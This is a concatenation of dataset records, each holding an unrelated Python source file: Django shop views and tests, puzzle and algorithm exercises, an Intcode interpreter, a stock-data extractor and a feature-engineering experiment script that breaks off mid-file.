(None, 1)])\n else:\n mod_info_layout = Layout() # nothing to display\n\n # Ground inventory\n header = SlotHeaderInfo(SlotTypes.GROUND, 0,\n tuple(self._mods_on_ground))\n\n loot_layout = self._slot_layout(header, num_rows=6)\n loot_layout = Layout([(None, 1), (loot_layout, 3), (None, 1)],\n 'horizontal')\n loot_layout = Layout([(None, 1), (loot_layout, 6), (None, 1)])\n\n right_half = Layout([(mod_info_layout, 7), (loot_layout, 8)])\n\n # combined halves\n layout = Layout([(left_half, 1), (right_half, 1)], 'horizontal')\n\n # Gap at top for information display.\n self._layout = Layout([(None, 1), (layout, 14)], dimensions=SCREEN_SIZE)\n\n def _slot_layout(self, slot_data: SlotHeaderInfo,\n num_rows: int = None) -> Layout:\n \"\"\"Vertical layout storing a single slot's data.\"\"\"\n\n # First row is just basic slot information\n elems: List[Tuple[Any, int]] = [(slot_data, 1)]\n for mod in slot_data.mods:\n elems.append((SlotRowInfo(mod, mod is self._selected_mod), 1))\n\n # Add padding to ensure consistent row sizes\n num_rows = _DEFAULT_ROWS_PER_SLOT if num_rows is None else num_rows\n\n if len(elems) < num_rows:\n elems.append((None, num_rows - len(elems)))\n\n return Layout(elems)\n\n\n_DEFAULT_ROWS_PER_SLOT = 4\n\n\ndef _slot_header(slot: SlotTypes, chassis: Chassis) -> SlotHeaderInfo:\n return SlotHeaderInfo(slot, chassis.slot_capacities[slot],\n chassis.mods_in_slot(slot))\n","sub_path":"src/models/scenes/inventory_scene.py","file_name":"inventory_scene.py","file_ext":"py","file_size_in_byte":8680,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"39286414","text":"class fPeragaanReimburse:\n def __init__(self,parentForm,FormObj):\n self.form = parentForm\n self.app = parentForm.ClientApplication\n\n def Show(self):\n self.ShowFixedAssetData()\n self.FormContainer.Show()\n\n def bCariClick(self,sender):\n self.ShowFixedAssetData()\n\n def ShowFixedAssetData(self):\n query1 = self.query1\n uipart = self.uipart\n field = uipart.Field or ''\n textcari = uipart.isian or ''\n\n AddParam =''\n if field != '':\n AddParam +=\"and %s LLIKE'%s' \" % (field,textcari)\n\n query1.OQLText = \" Select from reimbursementrealization as RR [ IsAuthorized='F' %s ]\\\n ( EmployeeId, \\\n LEmployee.LIndividu.IndividuName, \\\n LEmployee.LIndividu.AccountNo, \\\n LPlafond.OutPatientPlafond, \\\n LPlafond.InPatientPlafond, \\\n LPlafond.TotalPlafond, \\\n LPlafond.Realization, \\\n reimbursementdate, \\\n realizationvalue, \\\n Nominal, \\\n FinalBalance, \\\n BeginBalance, \\\n ReimbursementRealizationId, \\\n self \\\n );\" % (AddParam)\n query1.DisplayData()\n\n#[reimbursementdate BETWEEN '01/01/2012' AND '01/02/2012']\n\n","sub_path":"dialogs/karyawan/fPeragaanReimburse_intr.py","file_name":"fPeragaanReimburse_intr.py","file_ext":"py","file_size_in_byte":1163,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"480171524","text":"\"\"\"searching_algorithms URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/3.1/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. 
Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.contrib import admin\nfrom django.urls import path\nfrom searching_algorithms import views\n\nurlpatterns = [\n path('', views.index_page, name='searching-algorithms'),\n path('dfs/', views.index_page),\n path('bfs/', views.bfs_page),\n path('dijkstra/', views.dijkstra_page),\n path('min-max/', views.min_max_page),\n path('ucs/',views.ucs_page),\n path('puzzle/', views.puzzle_page),\n path('dls/', views.dls_page),\n path('admin/', admin.site.urls),\n]\n","sub_path":"searching_algorithms/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1125,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"208255496","text":"'''\nGiven a m x n matrix, if an element is 0, set its entire row and column to 0. Do it in-place.\n\nExample 1:\n\nInput: \n[\n [1,1,1],\n [1,0,1],\n [1,1,1]\n]\nOutput: \n[\n [1,0,1],\n [0,0,0],\n [1,0,1]\n]\nExample 2:\n\nInput: \n[\n [0,1,2,0],\n [3,4,5,2],\n [1,3,1,5]\n]\nOutput: \n[\n [0,0,0,0],\n [0,4,5,0],\n [0,3,1,0]\n]\nFollow up:\n\nA straight forward solution using O(mn) space is probably a bad idea.\nA simple improvement uses O(m + n) space, but still not the best solution.\nCould you devise a constant space solution?\n'''\n\ndef set_matrix_zeros(matrix):\n m, n = len(matrix), len(matrix[0])\n\n col_zero = False\n row_zero = False \n for i in range(m):\n if matrix[i][0] == 0:\n col_zero = True\n\n if 0 in matrix[0]: row_zero = True\n\n for i in range(1, m):\n for j in range(1, n):\n if matrix[i][j] == 0:\n matrix[i][0] = 0\n matrix[0][j] = 0\n\n for i in range(1, m):\n for j in range(1, n):\n if matrix[i][0] == 0 or matrix[0][j] == 0:\n matrix[i][j] = 0\n\n if col_zero: \n for i in range(m): matrix[i][0] = 0\n if row_zero: matrix[0] = [0]*n \n\n return matrix ","sub_path":"algorithms/matrix/set_matrix_zeros.py","file_name":"set_matrix_zeros.py","file_ext":"py","file_size_in_byte":1173,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"240792672","text":"import datetime\n\nimport pandas as pd\nfrom pytdx.hq import TdxHq_API\nfrom settings import settings\nfrom util import code2market\nfrom util import create_db_engine\nfrom util import find_latest_eod_date\nfrom util import trading_days_after\nfrom pytdx.params import TDXParams\n\ndb_engine = create_db_engine()\n\nstocks = pd.read_sql_query(\n\t\"SELECT code, id, name \"\n\t\"FROM stock \"\n\t\"WHERE ((current_price <> 0 AND latest_year IS NOT NULL AND NOT is_fund) OR (is_fund AND is_interesting))\"\n\t\" AND exchange IN ('SH', 'SZ')\"\n\t# \" AND '601313' < code AND code <= '999999'\"\n\t\" AND NOT is_ignored\"\n\t\" ORDER BY code\",\n\tdb_engine)\nstocks['market'] = stocks['code'].apply(code2market)\n\nminutes_per_trading_day = 240\n\ntoday = datetime.datetime.now().date()\ndefault_latest = today - datetime.timedelta(days=365)\napi = TdxHq_API()\n\nwith api.connect(settings['tdx_host'], settings['tdx_port']):\n\tfor code, market, name, stock_id in stocks[['code', 'market', 'name', 'id']].itertuples(index=False):\n\t\tprint('Updating', code, name, '...')\n\n\t\t# Finding the earliest EOD record for the stock, so we can later determine how many trading days's record to pull from TDX server\n\t\tlatest_dt = find_latest_eod_date(code, db_engine, default_latest)\n\t\tprint('Latest:', latest_dt)\n\n\t\t# Safe way to estimate the number of trading days between the stock's latest EOD record in our DB and current day -\n\t\t# 
trading_days_after(latest_date, now)\n\n\t\t# Retrieve EOD data from TDX, chopping off parts not needed\n\t\teod = api.to_df(api.get_security_bars(TDXParams.KLINE_TYPE_DAILY, market, code, 0, trading_days_after(latest_dt, today))) \\\n\t\t\t.drop(['vol', 'amount', 'year', 'month', 'day', 'hour', 'minute'], axis=1)\n\t\teod['avg'] = ((eod['open'] + eod['high'] + eod['low'] + eod['close']) * 1000 / 4).astype(int)\n\t\teod['date'] = pd.to_datetime(eod['datetime']).dt.date\n\t\teod['open'] = (eod['open'] * 1000).astype(int)\n\t\teod['high'] = (eod['high'] * 1000).astype(int)\n\t\teod['low'] = (eod['low'] * 1000).astype(int)\n\t\teod['close'] = (eod['close'] * 1000).astype(int)\n\t\teod['stock_id'] = stock_id\n\t\teod = eod.drop(['datetime'], axis=1)\n\t\teod = eod[(eod['date'] > latest_dt)]\n\n\t\t# Save it to DB\n\t\tprint('Inserting EOD ...')\n\t\teod.to_sql('stock_price', db_engine, if_exists='append', index=False)\n\n\t\t# EOM\n\t\t# dt_index = 0\n\t\t# while True:\n\t\t# \tdt_index += 1\n\t\t# \tdf = api.to_df(api.get_security_bars(TDXParams.KLINE_TYPE_1MIN, 1, code, minutes_per_trading_day*dt_index, minutes_per_trading_day))\n\t\t# \tif df.size == 0:\n\t\t# \t\tbreak\n\t\t#\n\t\t# \tdf['datetime'][0]\n\t\t# \tdf['datetime'][minutes_per_trading_day-1]\n\t\t#\n\t\t# \tif iter_date <= latest_dt:\n\t\t# \t\tbreak\n\t\t#\n\t\t# \t# Verify first and last minute line\n\t\t#\n\t\t# print('Inserting EOM ...')\n\n\tapi.disconnect()\n\nprint('Done updating stock EOD records.')\n","sub_path":"michael/findata/extract_eod.py","file_name":"extract_eod.py","file_ext":"py","file_size_in_byte":2765,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"477559036","text":"# author by claire\nimport re\n\n\nfrom class27_20200208_api_framework_v4.common.requests_handler import RequestsHandler\nfrom class27_20200208_api_framework_v4.config.setting import config\nfrom class27_20200208_api_framework_v4.middlerware.read_yml import yaml_data\nfrom jsonpath import jsonpath\n\nfrom class30_20200215_api_framework_v7.common.db_handler import DBHandler\n\n\ndef login():\n req = RequestsHandler()\n res = req.visit(config.host+'/member/login',\n 'post',\n json=yaml_data['user'],\n headers={\"X-Lemonban-Media-Type\":\"lemonban.v2\"})\n return res\n\nclass Context:\n # token = ''\n # member_id = None\n # loan_id = None\n def __init__(self):\n self.db = DBHandler(host=yaml_data['database']['host'],\n port=yaml_data['database']['port'],\n user=yaml_data['database']['user'],\n password=yaml_data['database']['password'],\n database=yaml_data['database']['database'],\n charset=yaml_data['database']['charset'])\n\n\n @property\n def loan_id(self):\n loan_id = self.db.query('select id from loan where status = %s;', args=[2, ])\n self.db.close()\n return loan_id\n\n def wrong_loan_id(self):\n wrong_loan_id = self.db.query('select id from loan where status != %s;', args=[2, ])\n self.db.close()\n return wrong_loan_id\n\n @property\n def token(self):\n data = login()\n token = jsonpath(data, '$..token')[0]\n token_type = jsonpath(data, '$..token_type')[0]\n token = \" \".join([token_type, token])\n return token\n\n @property\n def member_id(self):\n data = login()\n member_id = jsonpath(data, '$..id')[0]\n return member_id\n\n @property\n def wrong_member_id(self):\n wrong_member_id = Context.member_id + 1\n return wrong_member_id\n\n\ndef replace_label(target):\n re_pattern = r'#(.*?)#'\n while re.findall(re_pattern, target):\n key = re.search(re_pattern, target).group(1)\n target 
= re.sub(re_pattern, str(getattr(Context(), key)), target, 1)\n return target\n\n\ndef save_token():\n data = login()\n token = jsonpath(data, '$..token')[0]\n member_id = jsonpath(data, '$..id')[0]\n token_type = jsonpath(data, '$..token_type')[0]\n\n token = \" \".join([token_type, token])\n\n Context.token = token\n Context.member_id = member_id\n\n return token\n return {\"token\": token, \"member_id\": member_id}\n\nif __name__ == '__main__':\n # data = save_token()\n # print(data)\n a = getattr(Context(), 'member_id')\n print(a)\n\n","sub_path":"python 25 code/class30_20200215_api_framework_v7/middlerware/helper.py","file_name":"helper.py","file_ext":"py","file_size_in_byte":2681,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"288800028","text":"# Python Challenge Sudoku Solver - 4 by 4 Sudoku Solver\n# Alden Dent\n# 9/21/21\n\nimport numpy\n\nblankR1 = input(\"Enter the first row: \")\nblankR2 = input(\"Enter the second row: \")\nblankR3 = input(\"Enter the third row: \")\nblankR4 = input(\"Enter the fourth row: \")\nallPossibleRows = numpy.empty(24, dtype = object)\npossibleR1 = numpy.empty(0, dtype = object)\npossibleR2 = numpy.empty(0, dtype = object)\npossibleR3 = numpy.empty(0, dtype = object)\npossibleR4 = numpy.empty(0, dtype = object)\npossibleRowsColumns = numpy.empty((0, 4), dtype = object)\n\ndef uniqueCharacters(numberSet):\n for number in numberSet:\n if numberSet.count(number) != 1:\n return False\n return True\n\ndef uniqueColumns(row1, row2, row3, row4):\n for num in range(len(row1)):\n if not uniqueCharacters(row1[num] + row2[num] + row3[num] + row4[num]):\n return False\n return True\n\ndef matchesBlank(blankRow, filledRow):\n return blankRow[0] in (\"0\", filledRow[0]) and blankRow[1] in (\"0\", filledRow[1]) and blankRow[2] in (\"0\", filledRow[2]) and blankRow[3] in (\"0\", filledRow[3])\n\ndef drawBoard(row1, row2, row3, row4):\n print(row1)\n print(row2)\n print(row3)\n print(row4)\n\nfor i in range(1, 5):\n for j in range(1, 5):\n for k in range(1, 5):\n for l in range(1, 5):\n testRow = str(i) + str(j) + str(k) + str(l)\n if uniqueCharacters(testRow):\n if matchesBlank(blankR1, testRow):\n possibleR1 = numpy.append(possibleR1, testRow)\n if matchesBlank(blankR2, testRow):\n possibleR2 = numpy.append(possibleR2, testRow)\n if matchesBlank(blankR3, testRow):\n possibleR3 = numpy.append(possibleR3, testRow)\n if matchesBlank(blankR4, testRow):\n possibleR4 = numpy.append(possibleR4, testRow)\n\nfor row1 in possibleR1:\n for row2 in possibleR2:\n for row3 in possibleR3:\n for row4 in possibleR4:\n if uniqueColumns(row1, row2, row3, row4):\n arrayToAppend = numpy.reshape(numpy.array([[row1], [row2], [row3], [row4]]), (1, 4))\n possibleRowsColumns = numpy.append(possibleRowsColumns, arrayToAppend, axis = 0)\n\nprint(\"Empty board is:\")\ndrawBoard(blankR1, blankR2, blankR3, blankR4)\n\nfor solution in possibleRowsColumns:\n print(\"\")\n print(\"A solution is\")\n drawBoard(solution[0], solution[1], solution[2], solution[3])\n","sub_path":"Python/sudoku_solver_4x4.py","file_name":"sudoku_solver_4x4.py","file_ext":"py","file_size_in_byte":2519,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"599851963","text":"from django.test import TestCase\nfrom http import HTTPStatus\nfrom shops.models import City, Street, Shop\nfrom shops.config import STREET, CITY, STATE_SHOP, SHOP_OPEN, SHOP_CLOSED\nfrom django.contrib.auth import get_user_model\nfrom 
rest_framework.test import APITestCase, APIClient\n\n\nclass CityViewTest(TestCase):\n\n def test_get_city_list(self):\n response = self.client.get('/city')\n\n self.assertEqual(response.status_code, HTTPStatus.OK)\n\n\nclass StreetViewTest(TestCase):\n\n @classmethod\n def setUpTestData(cls):\n cls.city_id = City.objects.create(name='city_test').id\n\n def test_get_street_list(self):\n response = self.client.get(f'/{self.city_id}/street')\n\n self.assertEqual(response.status_code, HTTPStatus.OK)\n\n\nclass ShopListCreateViewTest(APITestCase):\n\n @classmethod\n def setUpTestData(cls):\n cls.city_obj = City.objects.create(name='city_test')\n cls.city_id = cls.city_obj.id\n cls.street_obj = Street.objects.create(name='street_test', city=cls.city_obj)\n cls.street_id = cls.street_obj.id\n\n cls.username = 'test_username'\n cls.password = 'test_password'\n cls.user_obj = get_user_model().objects.create(username=cls.username, password=cls.password)\n cls.user_id = cls.user_obj.id\n\n cls.client = APIClient()\n cls.token = cls.client.post('/auth/authorization',\n {'username': cls.username,\n 'password': cls.password}).json()['token']\n\n from datetime import time\n from random import randint\n for i in range(10):\n opening_hour, opening_min, opening_sec = randint(0, 23), randint(0, 59), randint(0, 59)\n closing_hour, closing_min, closing_sec = randint(0, 23), randint(0, 59), randint(0, 59)\n Shop.objects.create(name=f'shop_{i}',\n user=cls.user_obj,\n city=cls.city_obj,\n street=cls.street_obj,\n house=i,\n opening_time=time(opening_hour, opening_min, opening_sec),\n closing_time=time(closing_hour, closing_min, closing_sec)\n )\n\n def test_get_shop_list_without_params(self):\n response = self.client.get('/shop')\n self.assertEqual(response.status_code, HTTPStatus.OK)\n\n def test_get_shop_list_with_city(self):\n response = self.client.get('/shop', {CITY: self.city_id})\n self.assertEqual(response.status_code, HTTPStatus.OK)\n\n def test_get_shop_list_with_city_and_street(self):\n response = self.client.get('/shop', {CITY: self.city_id,\n STREET: self.street_id})\n self.assertEqual(response.status_code, HTTPStatus.OK)\n\n def test_get_shop_list_with_street_and_without_city(self):\n response = self.client.get('/shop', {STREET: self.street_id})\n self.assertEqual(response.status_code, HTTPStatus.BAD_REQUEST)\n\n def test_get_shop_list_with_city_and_street_state(self):\n response_open = self.client.get('/shop', {CITY: self.city_id,\n STREET: self.street_id,\n STATE_SHOP: SHOP_OPEN})\n response_closed = self.client.get('/shop', {CITY: self.city_id,\n STREET: self.street_id,\n STATE_SHOP: SHOP_CLOSED})\n\n self.assertEqual(response_open.status_code, HTTPStatus.OK)\n self.assertEqual(response_closed.status_code, HTTPStatus.OK)\n\n def test_create_shop_unauthorized(self):\n response = self.client.post('/shop', {'name': 'shop_name',\n 'user': self.user_id,\n 'city': self.city_id,\n 'street': self.street_id,\n 'house': 42,\n 'opening_time': (8, 0, 0),\n 'closing_time': (21, 0, 0)})\n\n self.assertEqual(response.status_code, HTTPStatus.UNAUTHORIZED)\n\n def test_create_shop_authorized(self):\n self.client.credentials(HTTP_AUTHORIZATION=f'JWT {self.token}')\n\n response = self.client.post('/shop', {'name': 'shop_name',\n 'user': self.user_id,\n 'city': self.city_id,\n 'street': self.street_id,\n 'house': 42,\n 'opening_time': '08:00:00',\n 'closing_time': '21:00:00'})\n\n self.assertEqual(response.status_code, 
HTTPStatus.OK)","sub_path":"rest_api/shops/tests/test_views.py","file_name":"test_views.py","file_ext":"py","file_size_in_byte":4986,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"294871066","text":"# -*- coding: utf-8 -*-\n\nimport json\n\n\nclass FunctionMeta:\n def __init__(self, invoked_function_id, function_name, function_version, function_handler, memory_size, timeout):\n self.invoked_function_id = invoked_function_id\n self.function_name = function_name\n self.function_version = function_version\n self.function_handler = function_handler\n self.memory_size = memory_size\n self.timeout = timeout\n\n def to_dict(self):\n return {\n \"id\": self.invoked_function_id,\n \"name\": self.function_name,\n \"version\": self.function_version,\n \"handler\": self.function_handler,\n \"memory\": self.memory_size,\n \"timeout\": self.timeout,\n }\n\n\nclass FCContext:\n def __init__(self, request_id, function_meta, log_set, log_topic):\n self.request_id = request_id\n self.function = function_meta\n self.log_set = log_set\n self.log_topic = log_topic\n\n def to_json(self):\n return json.dumps({\"requestId\": self.request_id,\n \"function\": self.function.to_dict(),\n \"logSet\": self.log_set,\n \"logTopic\": self.log_topic,\n })\n","sub_path":"commands/local/image/python36/server/context.py","file_name":"context.py","file_ext":"py","file_size_in_byte":1259,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"545713838","text":"import struct\nimport collections\nimport pudb as db\n\n\ndef integer_to_bitstring(num):\n s = collections.deque()\n remain = int(num)\n\n while remain > 0:\n bit = remain % 2\n s.appendleft( str(bit) )\n remain //= 2\n\n return ''.join(s)\n\n\ndef fraction_to_bitstring(num, max_length):\n # return a bitstring slightly longer than the max so you can detect overflow\n count = max_length + 2\n s = ''\n carry = num\n\n while carry != 0 and count > 0:\n carry *= 2\n s += '0' if carry < 1 else '1'\n count -= 1\n\n if carry >= 1:\n carry -= 1\n\n return s\n\n\ndef number_to_bytes(num):\n # assumes little-endian\n # displays as big-endian for easier human understanding\n bytes_array = struct.pack('f', num)\n s = ''\n\n for by in bytes_array[::-1]:\n s += bin(by)[2:].rjust(8, '0') + '\\n'\n\n return s.rstrip('\\n')\n\n\ndef float_bitstring(num):\n exp_length = 8\n mantissa_length = 23\n\n integer = int(abs(num))\n fraction = abs(num) - integer\n bs_int = integer_to_bitstring(integer)\n bs_frac = fraction_to_bitstring(fraction, mantissa_length)\n\n basis = 127\n bs_sign = '1' if num < 0 else '0'\n exp_int = basis + (len(bs_int) - 1) * (-1 if bs_sign == '1' else 1)\n bs_exp = integer_to_bitstring(exp_int)\n bs_mantissa = bs_int[1:] + bs_frac\n\n if len(bs_mantissa) > mantissa_length:\n raise Exception(\"ERROR: Number can't be accurately represented as float\")\n\n float_s = bs_sign\n float_s += bs_exp.rjust(exp_length, '0')\n float_s += bs_mantissa.ljust(mantissa_length, '0')\n\n s = ''\n for i in range(0, 8 * 4, 8):\n s += f\"{float_s[i:i + 8]}\" + \"\\n\"\n s += f\"bs_sign: {float_s[0]}, exponent: {float_s[1:9]}, mantissa: {float_s[9:]}\"\n\n return s\n\n\nif __name__ == '__main__':\n # Insert M into N starting at indeces i - j\n print('Insert M bit sequence into N bit sequence')\n M = 0b10011\n N = 0b10000000010\n i = 2\n j = 6\n\n count = N << 1\n mask = ~0\n\n # while count > 1:\n # mask <<= 1\n # count >>= 1\n # mask -= 1\n\n # mask >>= j\n mask <<= j\n mask |= (1 << i) 
- 1\n\n ans = N & mask | (M << i)\n print(bin(N), bin(mask), bin(ans))\n\n # Represent a decimal as a float\n print()\n print('Decimal number to float representation')\n num = 15.625\n print('number:', num)\n print('\\tto array of bytes:')\n print(number_to_bytes(num))\n print('\\tto float:')\n print(float_bitstring(num))\n num = -num\n print('number:', num)\n print('\\tto array of bytes:')\n print(number_to_bytes(num))\n print('\\tto float:')\n print(float_bitstring(num))\n\n # Flip 0 that produces longest sequence of 1's\n print()\n print(\"Flip 0 producing longest sequence of 1's\")\n num = 1775\n bitstring = bin(num)[2:]\n # using strings\n l = bitstring.split('0')\n print(l)\n\n length = 0\n for a, b in zip(l[0:], l[1:]):\n temp = len(a) + len(b)\n\n if temp > length:\n length = temp\n\n length += 1\n print('bitstring:', bitstring, 'length:', length)\n\n","sub_path":"other/bitwise.py","file_name":"bitwise.py","file_ext":"py","file_size_in_byte":2851,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"359880906","text":"# AoC December 2nd Part 1\nfile_path = r\"input.txt\"\n\nopcodes = open(file_path, \"r\").read().split(\",\")\nopcodes = list(map(int, opcodes))\n\nintput = 1\n\ndef parameter_mode(opcodes, instruction, idx):\n instruction = list(str(instruction))\n \n paramter_modes = ([0]*(5-len(instruction))) + instruction\n \n param1_value = opcodes[idx + 1] if int(paramter_modes[2]) == 0 else (idx + 1)\n param2_value = (opcodes[idx + 2] if int(paramter_modes[1]) == 0 else (idx + 2))\n param3_value = (opcodes[idx + 3] if int(paramter_modes[0]) == 0 else (idx + 3))\n\n return param1_value, param2_value, param3_value\n\nidx = 0\nwhile idx < len(opcodes):\n instruction = opcodes[idx]\n opcode = int(str(instruction)[-1])\n param1, param2, param3 = parameter_mode(opcodes, instruction, idx)\n\n if opcode == 1:\n opcodes[param3] = opcodes[param1] + opcodes[param2]\n idx += 4\n \n if opcode == 2:\n opcodes[param3] = opcodes[param1] * opcodes[param2]\n idx += 4\n\n if opcode == 3:\n opcodes[param1] = intput\n idx += 2\n\n if opcode == 4 or opcode == 99:\n if opcodes[param1] != 0 and opcodes[idx + 2] == 99:\n print(f\"Diagnostic tests succeed, final output = {opcodes[param1]}\")\n break\n elif opcodes[param1] != 0 and opcodes[idx + 2] != 99:\n print(f\"Diagnostic tests failed, output = {opcodes[param1]}\")\n break\n else:\n print(f\"Diagnostic test succeed, output = {opcodes[param1]}\")\n idx += 2\n\n if opcode == 5: \n if opcodes[param1] != 0:\n idx = opcodes[param2]\n else:\n idx += 3\n \n if opcode == 6:\n if opcodes[param1] == 0:\n idx = opcodes[param2]\n else:\n idx += 3\n\n if opcode == 7:\n if opcodes[param1] < opcodes[param2]:\n opcodes[param3] = 1\n else:\n opcodes[param3] = 0\n idx += 4 \n\n if opcode == 8:\n if opcodes[param1] == opcodes[param2]:\n opcodes[param3] = 1\n else:\n opcodes[param3] = 0\n idx += 4 \n\n\n","sub_path":"2019/Day07/p.py","file_name":"p.py","file_ext":"py","file_size_in_byte":2102,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"287489321","text":"def fillGlass(dpG, k, pos):\n i = 0\n dpG[i][i // 2] = k\n while i < pos[0] and dpG[i][i // 2] > 1:\n dpG[i + 1][0] = max((dpG[i][0] - 1) / 2, 0)\n for idx in range(1, i // 2 + 1):\n dpG[i + 1][idx] = max((dpG[i][idx - 1] - 1) / 2, 0) + max(\n (dpG[i][idx] - 1) / 2, 0)\n if i % 2 == 1:\n dpG[i + 1][(i + 1) // 2] = max(dpG[i][i // 2] - 1, 0)\n for idx in range((i // 2) + 1):\n dpG[i][idx] = min(1, 
dpG[i][idx])\n        i += 1\n    if pos[1] > pos[0] // 2:\n        pos = (pos[0], pos[0] - pos[1])\n    # print('\\n'.join(list(map(str, dpG))))\n    return min(dpG[pos[0]][pos[1]], 1)\n\n\nt = int(input())\nfor i in range(t):\n    k = int(input())\n    i = int(input())\n    j = int(input())\n    dpG = [[0] * ((c + 1) // 2) for c in range(1, k + 1)]\n    print('{0:.6f}'.format(fillGlass(dpG, k, (i - 1, j - 1))))\n","sub_path":"interview/07_recursion/05_overflow.py","file_name":"05_overflow.py","file_ext":"py","file_size_in_byte":806,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
+{"seq_id":"201996113","text":"from MLFE import load\nfrom MLFE import Model\nfrom MLFE import Buffer\nfrom MLFE import Env\nfrom MLFE import updateTargetGraph\nfrom MLFE import updateTarget\nfrom sklearn.model_selection import StratifiedKFold,KFold\nfrom sklearn.linear_model import LogisticRegression,Lasso\nfrom sklearn.ensemble import RandomForestClassifier, RandomForestRegressor\nfrom cleanlab.pruning import get_noise_indices\nfrom sklearn.metrics import matthews_corrcoef\nfrom utils import *\nfrom args import args\nimport tensorflow as tf\nimport os\nimport numpy as np\nfrom sklearn import metrics\nimport tqdm\nimport copy\nimport warnings\nimport math\n\nwarnings.filterwarnings('ignore')\n#os.environ[\"CUDA_VISIBLE_DEVICES\"] = \"0\"#args.cuda\nos.environ[\"CUDA_DEVICE_ORDER\"] = \"PCI_BUS_ID\"\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = \"-1\"\n\ntf_config = tf.ConfigProto()\ntf_config.gpu_options.per_process_gpu_memory_fraction = 0.1  # allocate 10%\n\n'''\n    Single agent\n    CAFEM network\n'''\n\n\ndef main(ii):\n    opt_type= 'o1'\n    opt_size = 9 if opt_type =='o1' else 5\n    qsa_size = 100\n    input_size = 400\n    buffer_size = 2000\n    seed = 3\n\n    file_path = 'seed.txt'  # random seed\n    file_obj = open(file_path, 'a')\n    file_obj.writelines(str(seed))\n    file_obj.write(\"\\n\")\n    file_obj.close()\n\n    num_epochs = 50000\n    n_jobs = 1\n    tau = 0.05\n    gamma = 0.9\n    epsilon = 1\n    batch_size = 100\n\n    save_model = True\n    train = True\n    test = True\n    out_dir = 'D:/FEL实验/1226/CAFEM-master1/src/out/ant-1-4/safem'+str(ii)\n    model_dir = 'D:/FEL实验/1226/CAFEM-master1/src/out/ant-1-4/safem_model'+str(ii)\n    if not os.path.isdir('D:/FEL实验/1226/CAFEM-master1/src/out/ant-1-4'):\n        os.mkdir('D:/FEL实验/1226/CAFEM-master1/src/out/ant-1-4')\n    if not os.path.isdir(model_dir):\n        os.mkdir(model_dir)\n    if not os.path.isdir(out_dir):\n        os.mkdir(out_dir)\n\n    did = 1480\n    f_dataset = \"D:/FEL实验/1226/CAFEM-master1/promise1/ant-1.4-train\"+str(ii)+\".arff\"\n    dataset, tasktype = load(f_path=f_dataset)\n    f_dataset1 = \"D:/FEL实验/1226/CAFEM-master1/promise1/ant-1.4-test\"+str(ii)+\".arff\"\n    dataset_test, tasktype = load(f_path=f_dataset1)\n\n\n    globalbuff = Buffer(buffer_size)\n    if train:\n\n\n        modelNetwork = Model(opt_size=opt_size, input_size=input_size, name=\"model\", maml=False)\n        targetNetwork = Model(opt_size=opt_size, input_size=input_size, name=\"target\", maml=False)\n\n        perf = 0\n        pretransform = []\n        with tf.Session(config=tf_config) as sess:\n            saver = tf.train.Saver()\n\n            saver.restore(sess, model_dir+ \"/model.ckpt\")\n\n\n\n            pretransform_test = []\n\n            for fid in tqdm.tqdm(range(dataset.shape[1] - 1), total=dataset.shape[1] - 1):\n                env_test = Env(dataset, feature=fid, opt_type=opt_type,tasktype=tasktype,\n                               random_state=seed, pretransform=pretransform_test, n_jobs=n_jobs,\n                               evaluatertype='rf')\n\n                s = np.copy(env_test.state)\n                act_mask = np.copy(env_test.action_mask)\n                Q = sess.run(modelNetwork.Q_, feed_dict={modelNetwork.inputs: [s]})\n                action = np.ma.masked_array(Q, mask=act_mask).argmax()\n                s_next, reward = env_test.step(action)\n\n                pretransform_test.append((fid, '_'.join(env_test.best_seq)))\n\n            f = open(os.path.join(out_dir, \"test_succeed_feat.csv\"), 'a')\n            for val in pretransform_test:\n                f.write(\"%d,%s\\n\" % (val[0], val[1]))\n            f.close()\n\n            dataset1 = np.vstack((dataset, dataset_test))\n            env1 = Env(dataset1, feature=0, opt_type=opt_type,tasktype=tasktype,\n                       random_state=seed, pretransform=pretransform_test, n_jobs=n_jobs, evaluatertype='rf')\n            dataset1_ = copy.deepcopy(env1.origin_dataset)\n            print('dataset1_:', env1.origin_dataset.shape[1] - 1)\n            kk = dataset.shape[0]\n            X_train1, X_test1 = dataset1_[0:kk, 0:-1], dataset1_[kk:, 0:-1]\n            y_train1, y_test1 = dataset1_[0:kk, -1], dataset1_[kk:, -1]\n            rf1 =LogisticRegression(solver='liblinear',random_state = seed)\n            rf1.fit(X_train1, y_train1)\n            pre = rf1.predict(X_test1)\n            final_pfm = metrics.f1_score(y_test1, pre, pos_label=1, average=\"binary\")\n            f = open(os.path.join(out_dir, \"test_succeed.csv\"), 'a')\n            f.write(\"%d,%.6f\\n\" % (ii, final_pfm))\n            f.close()\n\n            mcc = matthews_corrcoef(y_test1, pre)\n            f = open(os.path.join(out_dir, \"test_mcc.csv\"), 'a')\n            f.write(\"%d,%.6f\\n\" % (ii, mcc))\n            f.close()\n\n            prob = rf1.predict_proba(X_test1)\n            thresholds 